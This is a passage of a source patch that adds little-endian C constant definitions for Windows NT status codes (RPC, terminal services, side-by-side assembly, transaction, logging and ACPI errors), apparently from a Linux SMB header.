++#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
++#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
++#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
++#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
++#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
++#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
++#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
++#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
++#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
++#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
++#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
++#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
++#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
++#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
++#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
++#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
++#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
++#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
++#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
++#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
++#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
++#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
++#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
++#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
++#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
++#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
++#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
++#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
++#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
++#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
++#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
++#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
++#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
++#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
++#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
++#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
++#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
++#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
++#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
++#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
++#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
++#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
++#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
++#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
++#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
++#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
++#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
++#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
++#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
++#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
++#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
++#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
++#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
++#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
++#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
++#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
++#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
++#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
++#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
++#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
++#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
++#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
++#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
++#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
++#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
++#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
++#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
++#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
++#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
++#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
++#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
++#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
++#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
++#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
++#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
++#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
++#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
++#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
++#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
++#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
++#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
++#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
++#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
++#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
++#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
++#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
++#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
++#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
++#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
++#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
++#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
++#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
++#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
++#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
++#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
++#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
++#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
++#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
++#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
++#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
++#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
++#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
++#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
++#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
++#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
++#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
++#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
++#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
++#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
++#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
++#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
++#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
++#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
++#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
++#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
++#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
++#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
++#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
++#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
++#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
++#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
++#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
++#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
++#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
++#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
++#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
++#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
++#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
++#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
++#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
++#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
++#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
++#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
++#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
++#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
++#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
++#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
++#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
++#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
++#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
++#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
++#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
++#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
++#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
++#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
++#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
++#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
++#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
++#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
++#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
++#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
++#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
++#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
++#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
++#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
++#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
++#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
++#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
++#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
++#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
++#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
++#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
++#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
++#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
++#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
++#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
++#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
++#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
++#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
++#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
++#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
++#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
++#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
++#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
++#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
++#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
++#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
++#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
++#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
++#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
++#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
++#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
++#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
++#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
++#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
++#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
++#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
++#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
++#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
++#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
++#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
++#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
++#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
++#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
++#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
++#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
++#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
++#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
++#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
++#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
++#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
++#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
++#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
++#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY cpu_to_le32(0xC0150012)
++#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
++#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
++#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
++#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
++#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
++#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
++#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
++#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT cpu_to_le32(0xC015001C)
++#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
++#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
++#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
++#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
++#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
++#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
++#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
++#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
++#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
++#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
++#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
++#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
++#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
++#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
++#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
++#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
++#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
++#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
++#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
++#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
++#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
++#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
++#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
++#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
++#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
++#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
++#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
++#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
++#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
++#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
++#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
++#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
++#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
++#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
++#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
++#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
++#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION cpu_to_le32(0xC0190024)
++#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
++#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
++#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
++#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
++#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
++#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
++#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
++#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
++#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
++#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
++#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
++#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
++#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
++#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
++#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
++#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
++#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
++#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
++#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
++#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
++#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
++#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
++#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
++#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
++#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
++#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
++#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
++#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
++#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
++#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
++#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
++#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
++#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
++#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION cpu_to_le32(0xC0190053)
++#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
++#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
++#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
++#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
++#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
++#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
++#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
++#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
++#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
++#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
++#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
++#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
++#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
++#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
++#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
++#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
++#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
++#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
++#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
++#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
++#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
++#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
++#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
++#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
++#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
++#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
++#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
++#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
++#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
++#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
++#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
++#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
++#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
++#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
++#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
++#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
++#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
++#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
++#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
++#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
++#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
++#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
++#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
++#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
++#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
++#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
++#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
++#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
++#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
++#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
++#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
++#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
++#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
++#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
++#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
++#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
++#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
++#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
